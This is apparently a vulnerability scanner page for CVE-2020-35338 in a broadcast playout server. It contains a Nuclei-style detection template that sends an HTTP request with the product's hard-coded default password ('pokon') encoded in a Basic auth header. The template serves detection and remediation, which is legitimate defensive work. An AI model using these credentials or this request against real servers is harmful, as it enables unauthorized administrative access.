CVE-2020-35338: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection

Description

Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.

PoC

id: CVE-2020-35338

info:
  name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection
  author: Jeya Seelan
  severity: critical
  description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the server.
  remediation: |
    Change the default credentials to strong and unique ones.
  reference:
    - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35338
    - https://www.mobileviewpoint.com/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35338
    cwe-id: CWE-798
    epss-score: 0.12111
    epss-percentile: 0.95935
    cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mobileviewpoint
    product: wireless_multiplex_terminal_playout_server
  tags: cve,cve2020,wmt,default-login,mobileviewpoint,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/server/"

    headers:
      Authorization: "Basic OnBva29u"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WMT Server"

      - type: status
        status:
          - 200
# digest: 490a00463044022033bb6cd85949aafcf51fd906e595514df9aa002c9893df941f60560af144a9c2022017df3a1091261fb5045479aae6cce68a0f465ed68ea15ba02dac0946b953e7e4:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities